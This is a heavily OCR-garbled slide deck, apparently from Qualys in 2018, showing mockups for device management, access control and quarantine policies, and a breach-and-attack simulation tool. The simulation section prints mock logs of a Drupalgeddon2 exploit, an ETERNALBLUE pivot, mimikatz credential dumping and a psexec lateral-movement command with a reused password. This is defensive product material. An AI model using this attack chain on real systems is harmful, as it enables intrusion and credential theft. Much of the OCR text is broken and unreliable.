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| Q Search for assets Last 30 Days "| = 


LAST SEEN ASSET INFORMATION OPERATING SYSTEM SIAIUS INVENTORY TAGS 
Oct 05, 2018 10:18 AM IST Mark Android LENOVO Android Enrolled | Active | Android B 
Corporate - Owned 70 865596033698730 IL 
Lenovo TAB Modified On: Oct 05, 2018 
Oct 04, 2018 06:53 РМ IST — Jack Android LENOVO Android ` Enrolled | Active J Android 
Corporate - Owned 7.0 863854038393019 1 mon 
Lenovo TAB 7 Modified On: Oct 04, 2018 
Oct 04, 2018 06:46 PM IST — Andy. Android LENOVO Android Enrolled | Active | Android 
Corporate - Owned 7.0 864557031194883 1 mone 
Lenovo TAB 7 Modified On: Oct 04, 2018 
Oct 04, 2018 06:44 PM IST James iOS Apple ios ` Enrolled — Active J os 
Corporate - Owned 120 353779083466914 Tma 
Modified On: Oct 04, 2018 
Oct 04, 2018 06:33 PM IST — Richard. iOS, Apple ios ` Enrolled | Active J os 
Corporate - Owned 11.25 359497088355545 D 
iPhone $ Modified On: Oct 04, 2018 
Oct 03, 2018 06:59 PM IST Michael Android Motorola Android ` Enrolled Active | Android 
le - Owned 712 911503554758228 1 more 
Moto G (55) Modified On: Oct 03, 2018 
Sep 28, 2018 06:15 PM IST William, Android Asus Android ` Enrolled — Active | Android 
Corporate - Owned 70 358525085658221 1 то» 
convene AR Modified On: Sep 28, 2018 
Sep 25, 2018 06:10 PM IST — Charles Android Asus Android ` Enrolled | Active | Android 
Corporate - Owned 711 351558072379425 Tem 
ZenFone Zoom S Modified On: Sep 25, 2018 
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et Details: Station10_Tab1 


LENOVO 


Asset Summary 
Station10 Tabl LENOVO Rename 
Android v7 0 
Lenovo Manufacturer / Lenovo TB-7504X 
Status GRC Unauthorized Root Access 
E | | Non Compliant. =c 
Passcode Present Encryption Profiles 
[rm ee] ктш o 
Identification Activity 
Asset Name Lenovo TB-7504X Last Seen Nov 14, 2018 1205 PM PST 
Status Enrolled Enrolled On: — Oct 9, 2018 1129 AM PST 
Mode Active Modified On : Oct 10,2018 1129 AM PST 
Ownership Corporate - Owned. 


Username fCgby8os 
User Emad - 
Enrolled with AFW . Yes 


Last Location 


C 2, 
Fuquay-Varina, North Carolina United States 
Last Seen: Nov 14 2018 12:05 PM PST 
IP Address 7105232 M 
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Asset Details: Station10_Tab1_Lenovo 


Logs мм DENTIFER VERSION SYSTEM APP STATUS DETECTED ON 

Location ARO Service Bocling сот acme auto service booking 1.1 (2) No | Missing | Nov 09,2018 09:30 PM PST 

Actions ACME Customer Feedback com acme.cust feedback 100) No Found Nov 09, 2018 09-30 PM PST 
Device Apps (13) 

1-13 of 13 
NAVÍ IDENTIFIER VERSION SYSTEM APF USES MOCK LOCATION — INSTALLED ON ACTION 
TeamViewer com teamviewer teamviewer marke. . 14.0.35 (140035) No No Nov 09,2018 04:37 PM PST Uninstall 
inkwore com koushikdutta inkwire 1.0.1.7 (1499133600) No No Now 09, 2018 0423 PM PST Uninstall 
Gboard com google android inputmethod la 7.7.12.219989447 (2. Yes No Now 09, 2018 12:49 PM PST 
Gmail com google android gm 81021220187835:. Yes No Now 09, 2018 12:49 PM PST 
oneAssistant nfo oneassist V25 (25) No No Nov 09,2018 12:32 PM PST Uninstall 
"ome com google android apps.chromec . 26.6.19 (20606190) Мо No Nov 09, 2018 10:12 PM PST Uninstall 
Maps com google android apps maps 10.3.1 (1003101040) Yes No Nov 08, 2018 10:26 PM PST 
Google Play Movies & TV com google android videos 482018(40820181) Yes No Now 06, 2018 10.40 PM PST 
Gallery com oneplus gallery 210.10 (22270465) — ves No Now 06, 2018 10:40 PM PST 
Drive com google android apps docs 2184320440(18423 Yes No Now 06, 2018 10:39 PM PST 
SnoopSnitch de srlabs snoopsnitch 207(35) No No Nov 05, 2018 12:02 PM PST Uninstall 
YouTube com google android youtube 13.44.51 (134451340 . Yes No Now 05, 2018 11:38 PM PST 
QSC Conference © Qualys. 

Google Play Store com android vending 12.4.14-ай lol [PRÍ 21... Yes No Nov 05, 2018 11:35 PM PST 
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Tab1_LENOVO 


Locks the screen of the asset. Asset will be unusable unti a is unlocked 


Send a message to the user of the asset. The message will be sent as a Push Notification. 


Poll Mode: Asset will communicate to the Qualys server after the specified regular interval 
Push Mode: Qualys server will communicate to the asset only when a new action is scheduled for the asset 


Asset will buzz and current geolocation will be sent to the server, provided Location Services are enabled 


Sync on demand asset information 


Asset will be de-enrolided and server will not be able to communicate with the device. Also, corportae data on the 
asset will be deleted. 


Asset will be factory reset Server will no longer be able to communicate with the asset 
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Privacy 


DIY Portal 
Audit Control 
Ownership (Corporate/BYOD) 


Transparency 


© Qualys 


Feb 2019 - Closed Beta 
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P Multiple releases during 2019 
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Security Analytics & Orchestration 


Human Guided Policy-Driven Response Correlation Cross-Product Correlation 
Response & & 
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Additional Context from 3'4 Party 
Playbooks for Bi-Dir Ecosystems Sources 
Integration 
Detect KNOWN threats w/ out-of- 
BYOP- Bring-Your-Own-Playbook box rules 
Advanced 


Analytics 


Detect UNKNOWN threats Using Machine Learning 
Hacker Behavioral Analytics 


Predictive & Prescriptive SoC 
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Security Analytics & Orchestration Apps 


ML/AI Service Orchestration & Automation UEBA 
Patterns | Outlier | Predictive SoC Ecosystems Integration | Playbooks | User & Entity Behavior Analytics 
Response 


Threat Hunt Security Analytics Advanced Correlation 
Search | Exploration | Behavior Graph Anomaly | Visualization | Dashboard Actionable Insights | Out-of-box Rules 


Qualys Security Data Lake Platform 


Data Ingestion | Normalization | Enrichment | Governance 
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Network Security Server Endpoint 


Qualys Apps Cloud Users 


Qualys Quick Connectors 
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Characteristics of Data Lake 


# а G 9 


Collect Anything Dive in Anywhere Flexible Access 


Future Proof 


What is Security Data Lake? 


Single data store (single source of truth) 


Structured and unstructured data 


Data is transformed, normalized, and enriched 
Threat Intelligence feed integration, GeolP etc. 


Data has governance, semantic consistency, and access controls 


Store-once / Process-once / Use-multiple 
Apps, dashboards, data analytics 
Cross product search, reporting, visualization 
Machine learning, forensics, etc. 
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Qualys Apps 


Graphs/Topology Reports Dashboards | Search & correlation Cyber threat hunting 
Orchestration, Automation & Alerting Anomaly detection | User & entity behavior analytics 
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Secure Access Control 


Agenda 


What is Secure Access Control 
Use-cases 

Capabilities 

Policy-based orchestration 
Operationalizing Secure Access Control 
Mockups 
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Use Cases 


Grant access to resources only on a 
need basis. Block everything else. 


Automated asset attribute processing 
and enforcement without the need for 
manual action 


Limit access (e.g. quarantine) of 
vulnerable assets 


Block vulnerable assets from accessing 
critical network resources 


Use Cases 


Asset Inventory - Access control using asset inventory attributes 
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Use Cases 


© Vulnerabilities - Auarantine assets If vulnerable 


Vulnerability Found 


Employee Laptop 
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ipdate.microsoft.com 
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Use Cases 


54 Compliance - Block assets which Тай compliance 
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Policy-based Orchestration 


Security Control 
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Server.company.co 
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Trigger 
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Indicators of Compromise DASHBOARD HUNTING INCIDENTS ASSETS RULES g-frame-standard (123) © 7 


Alerts 


Q Search Last 30 days = 
64K ч 
Total Events 05 
04 
May 15 May 30 Now 
TYPE G + & 
file 1.4K 
mutex 300 TIME OBJECT ASSET SCORE 
network 200 
Process 300 a minute ago ж WmiPrvSE.exe H WIN8-1-UN-PATCH 
registry 100 12:10:17 AM C:\Windows\system32\wbem\wmiprvse.exe 10.115.76.190 
y 2 more 
bá aminute ago A \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... sa WIN8-1-UN-PATCH 
EVENT ACTION 12:10:17 AM taskhost.exe 10.115.76.190 
connected 400 a minute ago + SearchProtocolHost.exe go WIN8-1-UN-PATCH 
created 300 12:10:17 AM C:\Windows\system32\SearchProtocolHost.exe 10.115.76.190 
deleted 200 
disconnected 123 a minute ago Fag undefined : 0 Quick Actions v za WIN8-1-UN-PATCH 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe 10.115.76.190 
SCORE Event Details 
a minute ago # taskhost.exe mm  WIN8-1-UN-PATCH 
10 564 n s Asset Details аш 
8 421 12:10:17 АМ C:\Windows\system32\taskhost.exe 10.115.76.190 
Е 300 | à minute ago {+ undefined : 0 mm  WINS-1-UN-PATCH 
3 288 UM au 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe uarantin 10.115.76.190 
Delete Fil 
Processor 164 | aminuteago #  SearchFilterHost.exe Fr ss WIN8-1-UN-PATCH 
Memory 2 12:10:17 AM C:\Windows\system32\SearchFilterHost.exe 10.115.76.190 Qualys. 
HDD А (7 А SE 


Quarantine Asset 
Show brief information about this heading 


Policy 
(© Auto Create New Policy @ Select From Existing Policies 


Policy Name 


Select 


Qualys. 


Quarantine Asset 
Show brief information about this heading 


Policy 
°) Auto Create New Policy @ Select From Existing Policies 


Policy Name 


[ 
| Select 


Quarantine for all MacOS 
Policy to quarantine all macs OS vulnerability 


Block all wannacry 
Policy to block all waanaCry vulnerable assets 


Quarantine Policy for QSC 
Policy to block all QSC vulnerable assets 
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Quarantine Asset 
Show brief information about this heading 


Policy 
© Auto Create New Policy ( Select From Existing Policies 


Policy Name 


Quarantine policy for Asset: 10.19.57.65 


Description 


This is an auto created Quarantine policy for Asset 


Qualys. 


2 


View & Define 
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Secure Access Control = 


Policies 


12 


Total Policies 


STATUS 
Enabled 
Disable 


DYNAMIC ASSET CRITERIAS 
High Vulnerability Mac 

All Corporate Assets 

All Windows Assets 

All Linux Assets 

All Mac Assets 

All Laptops. 


STATIC ASSET LIST 

Build Servers 
Management Assets 

All Printers. 

IOT Devices 

Blacklisted Hosts 
Blacklisted Mac Addresses 


RULE TYPE 
Outbound 
Inbound 


ACTIONS. 
Allow 

Deny 

VLAN Switch 


PROTOCOLS 
TCP 
UDP 


07 
05 


2 
2 
1 
2 
2 
1 


Search 


Actions v 


SEQ. NO. 


1 


10 


11 


STATUS 


DASHBOARD POLICIES MONITORING CONFIGURATION 


POLICY 
Quarantine Policy for QSC 
VLAN 20 


Automatic Policy for Asset: 10.19.57.65 
ACL ACL Name example 


Quarentine all Mac OS High Sierra Vulnerability... 
VLAN 20 


Block all WannaCry Vulnerable assets 
ACL ACL Name example 


Notify all Heartbleed Vulnerable openSSL servers 
Traffic Rules Quarantine Ruleset 


Quarantine VLAN if OS is not updated 
Traffic Rules OS Update Check Ruleset 


Quarantine VLAN if Antivirus is not updated 
Traffic Rules 3 Rules 


Access to engineering resources for engineering team 
Traffic Rules З Rules 


Policy for feedback Kiosk at reception 
Traffic Rules 3 Rules 


Block all outbound connections to Chinese servers 
Traffic Rules З Rules 


Deny acccess to all vulnerable laptops 
Traffic Rules 3 Rules 


Quarantine Vulnerable servers 
Traffic Rules 3 Rules 


HOSTS 


John Doe (jdoe_quays)¥ © 4 


1-50 of 79 OL à 
RULESET ELIGIBLE ON ASSETS 
ы © 48 
High Vulnerability Mac 
En ® 22 
WannaCry Assets Criteria 
® © 48 
High Vulnerability Mac 
© © 22 
WannaCry Assets Criteria 
© © 35 
Heartbleed Asset Criteria 
® © 77 
Assets Missing OS Update 
ы © 11 
Assets Missing AV Updates 
ы © 322 
High Vulnerability Mac 
Eb © 123 
High Vulnerability Mac 
ы © 123 
High Vulnerability Mac 
Ed © 72 
High Vulnerability Mac 
Eb © 48 


High Vulnerability Mac 


Criteria 


WannaCry Asset Criteria # 
Something about what the user will need to know about the fields below. 


e 


Compliance 


„© 


Vulnerability 


Lh Custom Criteria 


© Custom Criteria 


EE © Qualys 
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€— Create New: Criteria 


Criteria 
АО yo 
User Hosts/Assets Vulnerability 
| Compliance Malware Location 
Saved Criterias 


| €» Custom Criteria 


Ed Custom Criteria 


WannaCry Asset Criteria ^ 


Something about what the user will need to know about the fields below. 


^ Rule 1. New or Active Vulnerability 


When a vulnerability is 


v New |] Fixed м Active | | Reopened 


Select Criteria — v 


A, Users 

ГІ Hosts 

© Vulnerability 
© Compliance 
© Malware 
® Location 


Cancel 


© Oualys. 


© Qualys. 
<— Create New: Criteria 


Criteria | 15 
— WannaCry Asset Criteria # 
O © Something about what the user will need to know about the fields below. 
agg 
User Hosts/Assets Vulnerability 
— ^ Rule 1: New or Active Vulnerability 194 
(2 (8) e When a vulnerability is 
Compliance Malware Location v New Fixed {v Active | | Reopened 
F 
Saved Criterias = 
Vulnerability Criteria 
€» Custom Criteria Type 


"e м) Confirmed {v Potential 
Lh Custom Criteria 


Severity 
п1 CEE 


Title 
v 
910 
Is іп the list v 1027 
CVE 
Select v 
CVSS Score 
Select v 
+ Add Criteria 
Cancel 
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é View Details: WIN-HL64HBLJP02 


VIEW MODE 
Summary 


System Information 


Agent Summary 
Network Information 
Open Ports 

linstalled Software 
Vulnerabilities 

Threat Protection 

File lintergirty Monitoring 
Indicator of Compromise 
Patch Management 


Security Access Control 


Security Access Control 


Access to engineering resources fo... 
Allow internal server access to all e... 


Allow internet access to all employe... 


Nov 09, 2018 at 10.05 АМ 
Nov 09 , 2018 at 9.17 AM 


Nov 09 , 2018 at 9.15 AM 


Outbound connections to malicious websites 
Prevent access to finance and payroll server 


Quarantine VLAN if Antivirus is not updated 


Today 

POLICY TIMELINE 
PS Oct 12, 2018, 2:13 AM 
PA "= % Quarantine Policy Applied... x 
P3 ° ©. - e e 
~ ө a a x e é e + е ы 

е 
i 9:00 AM 1.00 PM Now 
POLICY ELIGIBILITY TIMELINE 
PS 
pa . . 
P3 е 
Р2 . ы 
mo? 

9:00 AM 1.00 PM Now 
LAST 5 ENFORCED POLICIES NEVER ENFORCED ELIGIBLE POLICIES 

POLICY NAME TIME POLICY NAME 
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Best of Two Worlds 


Reliable first hand data 
In-Line Appliance enforces SAC offers both modes 
Appliance Low latency for data collection 
& enforcement 
Out of Multiple enforcement options Powerful Together 
Band Traffic volume agnostic Unique Value Proposition 
Switches 
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ach & Attack Simulation 
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Problems 


Limited assessment scope and capabilities 


Red Team operations can get expensive, not scalable, 
and lack completeness across the enterprise 


Lack of confidence in the effectiveness of security 
investments - prevention and detection 


Blue Teams struggle to evaluate the impact of new 
attacks against their existing security controls 
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Breach and Attack Simulation DASHBOARD SCANS ASSETS CAMPAIGNS mdani (admin271) 
| Filter by Asset Tags | | Last 30 days | Last refreshed 2 minutes ago o 


AVAILABLE CAMPAIGNS. TECHNIQUES 


Simulation m 


943 lw 7 20 шы 263 1“ 


TACTICS OVERVIEW BY FAILING TECHNIQUES 


Automated simulation 11 1 


vs. 187 scanned techniques 


of real-world TIPS k : 


Acces Execution Persistence 10е = Defense = Chaar! Discovey Lara Collection — Exílatin  Copmmand, 
p 9 ASSET BREAKDOWN BY SEVERITY TOP 5 FAILING TECHNIQUES 
ATI Dore K 
“СК ra awor 1.1K Tota Application Shimming 165 | Hoh | 
bi . : = Exploit Public-Facing Application 84 [ Hio | 
ou " Logon Scripts 83 = 
© lc 
Email Collection 73 od 
File System Permissions Weakness 64 
SCANS BY STATUS MOST FAILING CAMPAIGNS 
weakness.exploit.msword phish Jan 01,2018 165 
22 Total 
: exploit.compliance.eternalblue Feb 15, 2018 84 


o 
© rumi E weakness.compliance.password.reuse Jun 02, 2018 83 

© schedule 6 
exploit vulnerability drupalgeddon2 Aug 23, 2018 73 


Technical Approach 


Automated simulation of real-world T TPs 


Scale security assessments across the entire enterprise 
utilizing Qualys Cloud Agent 


Real-time insights mapped to MITRE ATT&CK'" 
framework 


Transition towards defense strategies based on offensive 
techniques 


Continuously measure security control drift over time 


© Qualys 


Qualys Breach and Attack Simulation (v0.1) 


Breach & Attack 
Simulation 


Description 


Show contents of a file 

Connect to an agent 

List connected agents 

Show this help menu 

Kill an active agent connection 


Centralized command- List files in current directory 


Get current working directory 


and-control framework zip <fi ipa file 


download «url» Download a file from the asset 


ОП Cloud Agent upload <url> Upload a file to the asset 


When enabled, agents Show IP-MAC pairs from system ARP table 


execute <command> Execute a command on the asset 


fu ПЕШО as Eit man openports Scan and show status for top 1024 TCP ports on the asset 


Collect metadata about the asset 


А С1еапир all traces of agent from the asset 
adversaries i Exit the current agent connection 


Non-destructive TTPs 
or live exploits 


T1190 - drupalgeddon2 the Drupalgeddon2 exploit 
71190 - apachestruts the Apache Struts S2-057 exploit 


Execution: 
- psexec Psexec for command execution 
T1191 - cmstp CMSTP.exe with a malicious .inf file for file execution 


T1173 - windde DDE to run arbitrary commands 


Persistence: 


Breach & Attack 
Simulation 


Use case: 


Drupalgeddon2 


(CVE-2018-7600) 


>>> use 1 


[+] Opening up live session with agent #1 (192.168.1.100) 
(agent #1) >>> drupalgeddon2 
URL for a public facing Drupal webapp (https://corpdomain.tld/blog): 


Please provide 
[20/Nov/2018] 
[20/Nov/2018] 
tld/blog 
[20/Nov/2018] 
NGELOG.txt 
[20/Nov/2018] 
-2018-7600 
[20/Nov/2018] 


a 


13: 
13: 


13: 


13: 


13: 


54: 
54: 


54: 


54: 


54: 


7b8b6a7ed2bbfec29g) 


[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
7ed2bbf8c29g) 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/ 2018] 
[20/Nov/2018] 
[20/Nov/2018] 
Edition 3.00. 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
RNALBLUE 
[20/Nov/2018] 
[20/Nov/2018] 


13 
13: 
13: 


13: 
13: 
13: 
13: 
13: 
13: 
13: 
135 
13: 
13: 
13: 
13; 
30. 
13: 
13: 
13: 
13: 
13: 
13: 
13: 
13: 


13: 
13: 


54: 
54: 
54: 


54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
TE 
55; 
55s 


50 
50 


2232 


IE 
55: 
Iz 
55: 
2155 
55; 
55: 
55; 


55: 
55: 


02 
өз 
04 
85 
86 
87 
87 
es 


09 
10 


PM 
PM 


PM 


PM 


PM 


PM 
py 
PM 


pr 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
P 

PM 
PM 


pr 
PM 
PM 
PM 
pr 
PM 
PM 
PM 


PM 
PM 


[STATUS]: Testing for T1190: Exploit Public-Facing Application 
[T1190] [INFORMATION]: Found public facing Drupal web host: https://corpdomain. 


[T1190] [INFORMATION] :| Drupal 7.46 detected via https://corpdomain.tld/blog/CHA 


[T1190] [INFORMATION] : 


Successfully exploited using Drupalge 


[T1190] [INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f2 


[STATUS]: Waiting for connection from sda32fds.exe 
[STATUS]: Connection received on TCP 32282 
[STATUS]: Process infromation sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a 


[INFORMATION] : 
[SYSTEMINFO]: 
[SYSTEMINFO] : 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 


[STATUS]: | T1018: 


Current QAttack agent privileges: user 
Currently logged on user: CORP/user1 
Operating system: Windows 7 SP1 (0S Build 6.1.7601) 
Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
Installed memory (RAM): 12.0 GB 
System type: 64-bit Operating System, x64-based processor 
Locale: EN-US 
Computer name: THINKPAD-111991-M710 
Full computer name: T-111991-M710.corp.domain.com 
Domain: corp.domain.com 
Anti Virus installed: Yes 
Anti Virus detected: Symantec Endpoint Protection Small Business 


Found 3 neighbors using discovery module 


INSECURECONFIG]: Found SMB ví enabled on 192.168.1.101 
STATUS]: Testing for T1210: Exploitation of Remote Services 
EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101 


EXPLOIT]: Sent 308B shellcode 


EXPLOIT]: Module ETERNALBLUE successful. 


[ 
[ 
[ 
[T1210][INFORMATION]: Module ETERNALBLUE in progress 
[ 
[ 
[ 


LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETE 


[EXPOIT]: QAttack agent copy sent to 192.168.1.101 


[INFORMATION]: 


fef892f27b8b6a7ed2bbf0c29g) 
[20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete. 


(agent #1) >>> 


QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21 
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Live View: Drupalgeddon2 [ cance | o | 


Search Options т 


A Search.. 


IDENTIFICATION TACTICS BREAKDOWN BY STATUS 
Scan: Drupalgeddon2 100 


Campaign: exploit.vulnerability.drupalgeddon2 
Status: InProgress НИ 26% 


TACTICS 


Initial Access d -© 192.168.1.104 
Execution i ane 

Persistence S - 192.168.1.103 

Privilege Escalation L 0G 

Defense Evasion 

X^ 6more IP: 192.168.1.100 


Hostname:  https;//corpdomain.tld 


STATUS ў h - + A -> © Username: CORP/administrator 


Breached 192168111 Processor AMD ThreadRipper 1980x 
Safe 


Privileges: administrator 
Error 


OPERATING SYSTEM Ба @ 

Windows 2012 Server 7-2. 192.168.1.105 

Windows Server 2012 R2 

Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 192.168.1.110 


LAURE | Breached 192.168.1.101  THINKPAD-98689-M710 


[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application 

[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tid/blog 

[11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/ CHANGELOG txt 
[11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600 

[11/10/2018] 10:01:51 АМ [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHAT: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g) 
[11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe 


kerberos 
* Username : vswin2k8r2sp1be$ 
* Domain : WORKGROUP 


Breach & Attack PE 


imikatz(commandline) # exit 


Simulation be 


20/Nov/2018] 13:58:31 PM [T1003][INFORMATION]: 

20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz. (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb 
0c27f) 

20/Nov/2018] 13:58:33 PM |[T1003] [INFORMATION asswords extracted: 4 

20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful 


Use case: 
+] Showing current cache: 


Credential Harvesting ll 
and Reuse 


Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 

ype: wdigest 

sername: Administrator 
Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 
ype: kerberos 


3. Lateral movements илл 


VSWIN2K8R2SP1BE 


ategory: application:proxy 
: credman 


Domain: VSWIN2K8R2SP1BE 


Domain: VSWIN2K8R2SP1BE 


Category: local 


Type: wdigest 
reac tla: Username: Administrator 
Password: Abcxxxxxxx5 


Domain: VSWIN2K8R2SP1BE 


e e 
S m ] t n Category: local 
1 U a 10 Type: kerberos 
Username: Administrator 


Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


Category: application:proxy 


Use Case: Type: credman 


Username: Administrator 
Password: Abcxxxxxxx5 


© red e n t | = | H = rvest | n © Domain: VSWIN2K8R2SP1BE 


(agent #1) >>> lateral 
a nd Heuse [20/Nov/2018] 14:32:29 PM [STATUS]: Testing for T1077: Windows Admin Share 
20/Nov/2018] 14:32:29 PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102 
[ 


T1077][ INFORMATION] : Windows admin$ share detected on 192.168.1.101 


[20/Nov/2018] 14:32:30 Pr 
[20/Nov/2018] 14:32:31 РМ [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102 


а = [20/Nov/2018] 14:32:32 РМ [71077 ] [ІМҒОКМАТІОМ]: Admin shares enumerated 
1. Uploading / running [20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts 
mimikatz [20/Nov/2018] 14:32:34 PM [T1078][ INFORMATION]: Testing for passwords retrieved using T1003 


[20/Nov/2018] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101 
20/Nov/2018] 14:32:36 PM [71078 ] [INFORMATION]: | Credentials detected administrator:Abcxxxxxxx5 | 
а T [20/Nov/2018] 14:32:37 PM [STATUS]: Attempting lateral movement using re-used credentials 

2. Extracting stored credentials [20/Nov/2018] 14:32:38 PM [STATUS]: Testing for 11835: Service Execution 
[20/Nov/2018] 14:32:38 PM [T1035][INFORMATION]: Read psexec.exe location from configuration: \\software\ 
psexec.exe (SHA1: e5@d9e3bd91908e13a26b3e23edeaf577fb3a095) 
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds3 
45gfed.exe \\192.168.1.101\c$\ 
20/Nov/2018] 14:32:39 PM Age eb е Mont ESTE TRE e ee -nobanner -d \\19 
2.168.1.101 -u administrator -p Abcxxxxxxx5 "C:\ds345gtgd.exe 
20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful. 
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe 
[20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3 
2095) 
[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete. 


(agent #1) >>> 


© Qualys. Enterprise 


Live View: Password Reuse 


Search Options т 


Q Search... 


IDENTIFICATION TACTICS BREAKDOWN BY STATUS 


Scan: Password Reuse 100 
Campaign: weakness.compliance.password.reuse 
Status: InProgress ШИН 34% 


TACTICS N 


Initial Access 


= 192.168.1.1 
Execution : ` n 92.168.1.104 
Persistence Ж T 
Am = А ci. 
Privilege Escalation LE دمو‎ 192.1 106 


Defense Evasion 


М 6more 


IP: 192.168.1.101 View details 
Hostname: THINKPAD-98689-M710 
Username: — CORP/user1 1921681. 


Processor: Intel (R) CORE(TM) i7-7770 


STATUS 
Breached | ый 

10 E Privil . administrator 
2% 192,168.1.100 — . 192.168.1.101 rivileges 


Bror 192.168.1 


OPERATING SYSTEM US = | a 


Windows 2012 Server nul 

Windows Server 2012 R2 --. 192.168.1.105 
Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 


192.168.1.107 


М 2more 7 Breached ^ 192.168.1.101  THINKPAD-98689-M710 


[11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe 
[11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601) 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB 


Benefits 
Fully and continuously assess known and emerging 
T TPs against all applications and operating systems 


Red Teams augment manual penetration testing of primary 
systems with autornated testing of secondary and tertiary 
Systems 


Empirically measure the effectiveness of security 
prevention and detection tools 


Blue Teams configure current tools to perform better or 
procure new/replacement tools 
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